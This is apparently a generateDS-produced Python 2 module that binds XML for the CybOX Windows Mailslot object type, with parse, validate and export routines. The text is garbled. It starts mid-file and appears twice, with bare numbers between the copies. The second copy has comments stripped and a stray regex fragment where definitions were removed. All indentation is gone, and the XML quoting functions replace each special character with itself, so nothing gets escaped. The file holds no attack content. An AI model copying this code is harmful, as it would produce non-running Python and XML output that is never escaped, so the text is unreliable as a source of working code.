XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
# normal ElementTree install
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError("Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
kwargs['parser'] = etree_.ETCompatXMLParser()
doc = etree_.parse(*args, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return '%f' % input_data
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(node, 'Requires sequence of booleans ("true", "1", "false", "0")')
return input_data
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'ascii'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(outfile, level):
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(outfile, level, namespace,name)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (self.name, self.value, self.name))
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' % \
(self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' % \
(self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s",\n' % \
(self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class WindowsMailslotObjectType(common.DefinedObjectType):
"""The WindowsMailslotObjectType is intended to characterize Windows
mailslot objects."""
subclass = None
superclass = common.DefinedObjectType
def __init__(self, Handle=None, Max_Message_Size=None, Name=None, Read_Timeout=None, Security_Attributes=None):
super(WindowsMailslotObjectType, self).__init__(None)
self.Handle = Handle
self.Max_Message_Size = Max_Message_Size
self.Name = Name
self.Read_Timeout = Read_Timeout
self.Security_Attributes = Security_Attributes
def factory(*args_, **kwargs_):
if WindowsMailslotObjectType.subclass:
return WindowsMailslotObjectType.subclass(*args_, **kwargs_)
else:
return WindowsMailslotObjectType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Handle(self): return self.Handle
def set_Handle(self, Handle): self.Handle = Handle
def get_Max_Message_Size(self): return self.Max_Message_Size
def set_Max_Message_Size(self, Max_Message_Size): self.Max_Message_Size = Max_Message_Size
def get_Name(self): return self.Name
def set_Name(self, Name): self.Name = Name
def get_Read_Timeout(self): return self.Read_Timeout
def set_Read_Timeout(self, Read_Timeout): self.Read_Timeout = Read_Timeout
def get_Security_Attributes(self): return self.Security_Attributes
def set_Security_Attributes(self, Security_Attributes): self.Security_Attributes = Security_Attributes
def export(self, outfile, level, namespace_='WinMailslotObj:', name_='WindowsMailslotObjectType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='WindowsMailslotObjectType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='WinMailslotObj:', name_='WindowsMailslotObjectType'):
super(WindowsMailslotObjectType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='WindowsMailslotObjectType')
def exportChildren(self, outfile, level, namespace_='WinMailslotObj:', name_='WindowsMailslotObjectType', fromsubclass_=False):
if self.Handle is not None:
self.Handle.export(outfile, level, 'WinMailslotObj:', name_='Handle')
if self.Max_Message_Size is not None:
self.Max_Message_Size.export(outfile, level, 'WinMailslotObj:', name_='Max_Message_Size')
if self.Name is not None:
self.Name.export(outfile, level, 'WinMailslotObj:', name_='Name')
if self.Read_Timeout is not None:
self.Read_Timeout.export(outfile, level, 'WinMailslotObj:', name_='Read_Timeout')
if self.Security_Attributes is not None:
self.Security_Attributes.export(outfile, level, 'WinMailslotObj:', name_='Security_Attributes')
def hasContent_(self):
if (
self.Handle is not None or
self.Max_Message_Size is not None or
self.Name is not None or
self.Read_Timeout is not None or
self.Security_Attributes is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='WindowsMailslotObjectType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.Handle is not None:
showIndent(outfile, level)
outfile.write('Handle=%s,\n' % quote_python(self.Handle).encode(ExternalEncoding))
if self.Max_Message_Size is not None:
showIndent(outfile, level)
outfile.write('Max_Message_Size=%s,\n' % quote_python(self.Max_Message_Size).encode(ExternalEncoding))
if self.Name is not None:
showIndent(outfile, level)
outfile.write('Name=%s,\n' % quote_python(self.Name).encode(ExternalEncoding))
if self.Read_Timeout is not None:
showIndent(outfile, level)
outfile.write('Read_Timeout=%s,\n' % quote_python(self.Read_Timeout).encode(ExternalEncoding))
if self.Security_Attributes is not None:
showIndent(outfile, level)
outfile.write('Security_Attributes=%s,\n' % quote_python(self.Security_Attributes).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Handle':
Handle_ = child_.text
Handle_ = self.gds_validate_string(Handle_, node, 'Handle')
self.Handle = Handle_
elif nodeName_ == 'Max_Message_Size':
Max_Message_Size_ = child_.text
Max_Message_Size_ = self.gds_validate_string(Max_Message_Size_, node, 'Max_Message_Size')
self.Max_Message_Size = Max_Message_Size_
elif nodeName_ == 'Name':
Name_ = child_.text
Name_ = self.gds_validate_string(Name_, node, 'Name')
self.Name = Name_
elif nodeName_ == 'Read_Timeout':
Read_Timeout_ = child_.text
Read_Timeout_ = self.gds_validate_string(Read_Timeout_, node, 'Read_Timeout')
self.Read_Timeout = Read_Timeout_
elif nodeName_ == 'Security_Attributes':
Security_Attributes_ = child_.text
Security_Attributes_ = self.gds_validate_string(Security_Attributes_, node, 'Security_Attributes')
self.Security_Attributes = Security_Attributes_
super(WindowsMailslotObjectType, self).buildChildren(child_, node, nodeName_, True)
# end class WindowsMailslotObjectType
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Mailslot'
rootClass = WindowsMailslotObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(sys.stdout, 0, name_=rootTag,
namespacedef_='')
return rootObj
def parseString(inString):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Mailslot'
rootClass = WindowsMailslotObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(sys.stdout, 0, name_="Windows_Mailslot",
namespacedef_='')
return rootObj
def parseLiteral(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Mailslot'
rootClass = WindowsMailslotObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('#from Win_Mailslot_Object import *\n\n')
sys.stdout.write('import Win_Mailslot_Object as model_\n\n')
sys.stdout.write('rootObj = model_.rootTag(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"WindowsMailslotObjectType"
]
| 38.486063
| 145
| 0.626499
|
import sys
import getopt
import re as re_
import common_types_1_0 as common
import win_handle_object_1_2 as win_handle_object
etree_ = None
Verbose_import_ = False
( XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError("Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
kwargs['parser'] = etree_.ETCompatXMLParser()
doc = etree_.parse(*args, **kwargs)
return doc
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return '%f' % input_data
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(node, 'Requires sequence of booleans ("true", "1", "false", "0")')
return input_data
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
(.*)')
def showIndent(outfile, level):
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(outfile, level, namespace,name)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (self.name, self.value, self.name))
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' % \
(self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' % \
(self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s",\n' % \
(self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class WindowsMailslotObjectType(common.DefinedObjectType):
"""The WindowsMailslotObjectType is intended to characterize Windows
mailslot objects."""
subclass = None
superclass = common.DefinedObjectType
def __init__(self, Handle=None, Max_Message_Size=None, Name=None, Read_Timeout=None, Security_Attributes=None):
super(WindowsMailslotObjectType, self).__init__(None)
self.Handle = Handle
self.Max_Message_Size = Max_Message_Size
self.Name = Name
self.Read_Timeout = Read_Timeout
self.Security_Attributes = Security_Attributes
def factory(*args_, **kwargs_):
if WindowsMailslotObjectType.subclass:
return WindowsMailslotObjectType.subclass(*args_, **kwargs_)
else:
return WindowsMailslotObjectType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Handle(self): return self.Handle
def set_Handle(self, Handle): self.Handle = Handle
def get_Max_Message_Size(self): return self.Max_Message_Size
def set_Max_Message_Size(self, Max_Message_Size): self.Max_Message_Size = Max_Message_Size
def get_Name(self): return self.Name
def set_Name(self, Name): self.Name = Name
def get_Read_Timeout(self): return self.Read_Timeout
def set_Read_Timeout(self, Read_Timeout): self.Read_Timeout = Read_Timeout
def get_Security_Attributes(self): return self.Security_Attributes
def set_Security_Attributes(self, Security_Attributes): self.Security_Attributes = Security_Attributes
def export(self, outfile, level, namespace_='WinMailslotObj:', name_='WindowsMailslotObjectType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='WindowsMailslotObjectType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='WinMailslotObj:', name_='WindowsMailslotObjectType'):
super(WindowsMailslotObjectType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='WindowsMailslotObjectType')
def exportChildren(self, outfile, level, namespace_='WinMailslotObj:', name_='WindowsMailslotObjectType', fromsubclass_=False):
if self.Handle is not None:
self.Handle.export(outfile, level, 'WinMailslotObj:', name_='Handle')
if self.Max_Message_Size is not None:
self.Max_Message_Size.export(outfile, level, 'WinMailslotObj:', name_='Max_Message_Size')
if self.Name is not None:
self.Name.export(outfile, level, 'WinMailslotObj:', name_='Name')
if self.Read_Timeout is not None:
self.Read_Timeout.export(outfile, level, 'WinMailslotObj:', name_='Read_Timeout')
if self.Security_Attributes is not None:
self.Security_Attributes.export(outfile, level, 'WinMailslotObj:', name_='Security_Attributes')
def hasContent_(self):
if (
self.Handle is not None or
self.Max_Message_Size is not None or
self.Name is not None or
self.Read_Timeout is not None or
self.Security_Attributes is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='WindowsMailslotObjectType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.Handle is not None:
showIndent(outfile, level)
outfile.write('Handle=%s,\n' % quote_python(self.Handle).encode(ExternalEncoding))
if self.Max_Message_Size is not None:
showIndent(outfile, level)
outfile.write('Max_Message_Size=%s,\n' % quote_python(self.Max_Message_Size).encode(ExternalEncoding))
if self.Name is not None:
showIndent(outfile, level)
outfile.write('Name=%s,\n' % quote_python(self.Name).encode(ExternalEncoding))
if self.Read_Timeout is not None:
showIndent(outfile, level)
outfile.write('Read_Timeout=%s,\n' % quote_python(self.Read_Timeout).encode(ExternalEncoding))
if self.Security_Attributes is not None:
showIndent(outfile, level)
outfile.write('Security_Attributes=%s,\n' % quote_python(self.Security_Attributes).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Handle':
Handle_ = child_.text
Handle_ = self.gds_validate_string(Handle_, node, 'Handle')
self.Handle = Handle_
elif nodeName_ == 'Max_Message_Size':
Max_Message_Size_ = child_.text
Max_Message_Size_ = self.gds_validate_string(Max_Message_Size_, node, 'Max_Message_Size')
self.Max_Message_Size = Max_Message_Size_
elif nodeName_ == 'Name':
Name_ = child_.text
Name_ = self.gds_validate_string(Name_, node, 'Name')
self.Name = Name_
elif nodeName_ == 'Read_Timeout':
Read_Timeout_ = child_.text
Read_Timeout_ = self.gds_validate_string(Read_Timeout_, node, 'Read_Timeout')
self.Read_Timeout = Read_Timeout_
elif nodeName_ == 'Security_Attributes':
Security_Attributes_ = child_.text
Security_Attributes_ = self.gds_validate_string(Security_Attributes_, node, 'Security_Attributes')
self.Security_Attributes = Security_Attributes_
super(WindowsMailslotObjectType, self).buildChildren(child_, node, nodeName_, True)
# end class WindowsMailslotObjectType
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Mailslot'
rootClass = WindowsMailslotObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(sys.stdout, 0, name_=rootTag,
namespacedef_='')
return rootObj
def parseString(inString):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Mailslot'
rootClass = WindowsMailslotObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(sys.stdout, 0, name_="Windows_Mailslot",
namespacedef_='')
return rootObj
def parseLiteral(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Mailslot'
rootClass = WindowsMailslotObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('#from Win_Mailslot_Object import *\n\n')
sys.stdout.write('import Win_Mailslot_Object as model_\n\n')
sys.stdout.write('rootObj = model_.rootTag(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
